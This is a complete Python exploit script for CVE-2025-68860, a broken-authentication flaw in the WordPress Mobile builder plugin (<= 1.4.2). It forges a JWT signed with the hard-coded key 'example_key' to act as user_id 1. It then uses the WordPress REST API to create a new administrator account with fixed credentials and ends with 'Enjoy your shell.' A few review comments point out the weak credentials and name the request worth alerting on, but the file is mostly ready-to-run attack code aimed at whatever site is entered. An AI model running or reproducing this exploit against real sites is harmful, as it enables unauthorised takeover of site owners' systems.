"""
================================================================================
Exploit Title: WordPress Mobile builder Plugin <= 1.4.2 Broken Authentication
CVE: CVE-2025-68860
Priority: High
Description:
This script is self-contained: it does not depend on any prior state, settings, or other exploits.
On execution, it generates a valid JWT token for WordPress Mobile builder <= 1.4.2,
authenticates as admin (user_id=1), and uses that token to create a new administrator account.
Vulnerability Reference: CVE-2025-68860
Plugin: WordPress Mobile builder (<= 1.4.2)
Author: Nxploited (Khaled Alenazi)
Telegram: @KNxploited
GitHub: https://github.com/Nxploited
================================================================================
"""
#!/usr/bin/env python3
from __future__ import annotations
import time
import jwt
import requests
import json
from colorama import Fore, Style, init as color_init
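# Initialise colorama; autoreset=True restores default colours after every print().
color_init(autoreset=True)

# Banner printed once at start-up. Raw string so the box-drawing characters are kept verbatim.
BANNER = r'''
╔═══════════════════════════════════════════════════════════════════╗
║ WordPress Mobile builder <= 1.4.2 Broken Authentication Exploit ║
║ CVE-2025-68860 Priority: HIGH ║
╚═══════════════════════════════════════════════════════════════════╝
'''

# Attribution lines shown under the banner and again at the end of main().
# Plain literals: the original f-strings had no placeholders (ruff F541).
AUTHOR_INFO = [
    "Exploit by : Nxploited (Khaled Alenazi)",
    "Telegram : @KNxploited",
    "GitHub : https://github.com/Nxploited",
]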
def print_status(msg: str, level: str = "info") -> None:
    """Print *msg* prefixed with an upper-cased ``[LEVEL]`` tag and coloured by level.

    Known levels are info (cyan), success (green), error (red) and warning (yellow);
    any other level falls back to white. The colour is reset after the message.
    """
    level_colours = {
        "info": Fore.CYAN,
        "success": Fore.GREEN,
        "error": Fore.RED,
        "warning": Fore.YELLOW,
    }
    colour = level_colours.get(level, Fore.WHITE)
    print("[" + level.upper() + "] " + colour + msg + Style.RESET_ALL)
def show_banner() -> None:
    """Print the BANNER in light yellow, then each AUTHOR_INFO line in white, then a blank line."""
    print(f"{Fore.LIGHTYELLOW_EX}{BANNER}{Style.RESET_ALL}")
    for author_line in AUTHOR_INFO:
        print(f"{Fore.WHITE}{author_line}{Style.RESET_ALL}")
    print()
def build_jwt_token(base_url: str, user_id: int = 1, secret: str = "example_key", ttl: int = 3600) -> str:
    """Return an HS256-signed JWT for *user_id*, issued by *base_url* and valid for *ttl* seconds.

    Claims are ``iss`` (the site URL), ``iat``/``nbf`` (now, whole seconds), ``exp``
    (now + ttl) and a ``data`` object holding ``user_id``.

    ``secret`` defaults to the literal ``"example_key"``. The script's premise (not
    verified here) is that the plugin validates tokens against that fixed value, which
    is what makes the signature forgeable by anyone who knows it.
    """
    issued_at = int(time.time())
    claims = dict(
        iss=base_url,
        iat=issued_at,
        nbf=issued_at,
        exp=issued_at + ttl,
        data={"user_id": user_id},
    )
    return jwt.encode(claims, secret, algorithm="HS256")
def pretty_json(j) -> str:
    """Serialise *j* as 2-space-indented JSON, leaving non-ASCII characters unescaped."""
    return json.dumps(j, indent=2, ensure_ascii=False)
def print_admin_credentials(username, password, email):
    """Print the created account's username, password and email inside a coloured box.

    A blank line precedes and follows the box; labels are cyan, values use one colour each.
    """
    header = "==============[ New Admin Credentials ]=============="
    footer = "=" * 51
    rows = (
        ("Username", Fore.GREEN, username),
        ("Password", Fore.YELLOW, password),
        ("Email", Fore.MAGENTA, email),
    )
    print()
    print(f"{Fore.LIGHTMAGENTA_EX}{header}{Style.RESET_ALL}")
    for label, colour, value in rows:
        print(f"{Fore.CYAN}{label} :{Style.RESET_ALL} {colour}{value}{Style.RESET_ALL}")
    print(f"{Fore.LIGHTMAGENTA_EX}{footer}{Style.RESET_ALL}")
    print()
def main():
    """Interactive entry point.

    Prompts for a site URL, signs a JWT for user_id 1 with the hard-coded secret,
    checks it against ``/wp-json/wp/v2/users/me``, then POSTs a new administrator
    account to ``/wp-json/wp/v2/users`` with fixed, publicly known credentials.

    Exits with status 1 on an empty URL and 2 if the token check does not return 200.
    """
    show_banner()
    print_status("CVE-2025-68860 // WordPress Mobile builder Broken Authentication", "info")
    print_status("All old exploits/settings are ignored, running this vector only.", "info")
    # Trailing slash is stripped so the path concatenations below do not double it.
    url = input(Fore.YELLOW + "Site URL (example: http://target.site): " + Style.RESET_ALL).strip().rstrip("/")
    if not url:
        print_status("URL is required.", "error")
        # NOTE(review): bare exit() is the site-module helper; sys.exit() is the portable form.
        exit(1)
    # The signing key is a fixed literal, not discovered from the target: the whole
    # technique rests on the plugin accepting tokens signed with this default value.
    secret = "example_key"
    user_id = 1
    # STEP 1: BUILD JWT
    print_status("Generating JWT as admin (user_id=1)...", "info")
    token = build_jwt_token(url, user_id=user_id, secret=secret)
    print(Fore.GREEN + token + Style.RESET_ALL)
    print("-"*62)
    # STEP 2: VERIFY ADMIN SESSION
    print_status("Testing JWT at /wp-json/wp/v2/users/me", "info")
    api_me = f"{url}/wp-json/wp/v2/users/me"
    headers = {"Authorization": f"Bearer {token}"}
    # verify=False disables TLS certificate validation for this request
    # (requests emits an InsecureRequestWarning); a 200 here is taken as proof of admin access.
    resp = requests.get(api_me, headers=headers, timeout=15, verify=False)
    if resp.status_code == 200:
        print_status("JWT valid! Confirmed admin access.", "success")
    else:
        print_status(f"Token/endpoint failed: {resp.status_code} {resp.text[:70]}", "error")
        exit(2)
    print("-"*62)
    print_status("Creating admin account using exploit...", "info")
    api_users = f"{url}/wp-json/wp/v2/users"
    # Fixed, weak credentials for the created account: anyone who has read this
    # script knows them, so a site hit by it is exposed to more than its original user.
    admin_username = "Nxploited"
    admin_password = "admin"
    admin_email = "[email protected]"
    admin_data = {
        "username": admin_username,
        "name": admin_username,
        "email": admin_email,
        "password": admin_password,
        "roles": ["administrator"]
    }
    headers = {
        "Authorization": f"Bearer {token}",
        "Content-Type": "application/json"
    }
    # Defensive note: this POST to wp/v2/users with roles=["administrator"], bearing a
    # JWT signed with the default key, is the action worth alerting on and blocking.
    resp = requests.post(api_users, headers=headers, json=admin_data, timeout=15, verify=False)
    # NOTE(review): the request above has already returned; the sleep and the
    # "please wait" message are purely cosmetic.
    time.sleep(1.2)
    print_status("Exploiting, please wait...", "info")
    if resp.status_code in (200,201):
        print_status("✅ Admin user created successfully!", "success")
        print_admin_credentials(admin_username, admin_password, admin_email)
        try:
            resj = resp.json()
            print(Fore.LIGHTGREEN_EX + "Full API response:" + Style.RESET_ALL)
            print(pretty_json(resj))
        except Exception:
            # Any JSON decode failure falls back to the raw body, truncated to 350 chars.
            print(Fore.YELLOW + resp.text[:350] + Style.RESET_ALL)
    else:
        print_status(f"Failed to create admin: [{resp.status_code}] {resp.text[:120]}", "error")
    print("-"*62)
    print_status("Exploit finished. Enjoy your shell.", "success")
    print("")
    for line in AUTHOR_INFO: print(Fore.WHITE + line + Style.RESET_ALL)
if __name__ == "__main__":
    # Run only when executed as a script, not when imported as a module.
    main()